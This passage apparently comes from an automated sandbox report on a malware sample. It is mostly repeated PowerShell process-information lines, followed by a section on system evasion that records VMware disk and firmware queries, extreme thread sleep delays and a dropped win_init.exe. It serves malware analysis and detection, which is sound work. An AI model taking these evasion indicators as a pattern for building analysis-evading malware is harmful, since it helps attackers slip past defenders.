                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (98 occurrences)
                          Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX (6 occurrences)
                          Source: C:\Windows\System32\tasklist.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (15 occurrences)
                          Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX (5 occurrences)
                          Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (5 occurrences)
                          Source: C:\Users\user\AppData\Roaming\win_init.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (2 occurrences)
                          Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process information set: NOOPENFILEERRORBOX (6 occurrences)

                          Malware Analysis System Evasion

                          Source: C:\Windows\System32\notepad.exe System information queried: FirmwareTableInformation
                          Source: C:\Windows\System32\svchost.exe File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (5 occurrences)
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 592831
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 592643
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 592453
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 592159
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 591956
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 591831
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 591706
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 591581
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 591467
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 591360
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 591222
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 591097
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 590972
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 590856
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (2 occurrences)
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5363
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4458
                          Source: C:\Windows\System32\conhost.exe Window / User API: threadDelayed 401
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9560
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9691
                          Source: C:\Windows\System32\conhost.exe Window / User API: threadDelayed 397
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7154
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 935
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5608 Thread sleep time: -14757395258967632s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6936 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1016 Thread sleep count: 9560 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3688 Thread sleep time: -15679732462653109s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5416 Thread sleep count: 190 > 30
                          Source: C:\Windows\System32\svchost.exe TID: 5388 Thread sleep time: -30000s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5908 Thread sleep count: 9691 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520 Thread sleep time: -22136092888451448s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4048 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520 Thread sleep time: -592831s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520 Thread sleep time: -592643s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520 Thread sleep time: -592453s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520 Thread sleep time: -592159s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520 Thread sleep time: -591956s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520 Thread sleep time: -591831s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520 Thread sleep time: -591706s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520 Thread sleep time: -591581s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520 Thread sleep time: -591467s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520 Thread sleep time: -591360s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520 Thread sleep time: -591222s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520 Thread sleep time: -591097s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520 Thread sleep time: -590972s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520 Thread sleep time: -590856s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6992 Thread sleep time: -16602069666338586s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 944 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
                          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed (7 occurrences)
                          Source: C:\Windows\System32\svchost.exe File Volume queried: C:\ FullSizeInformation (3 occurrences)
                          Source: C:\Windows\System32\svchost.exe File Volume queried: C:\Windows\System32 FullSizeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
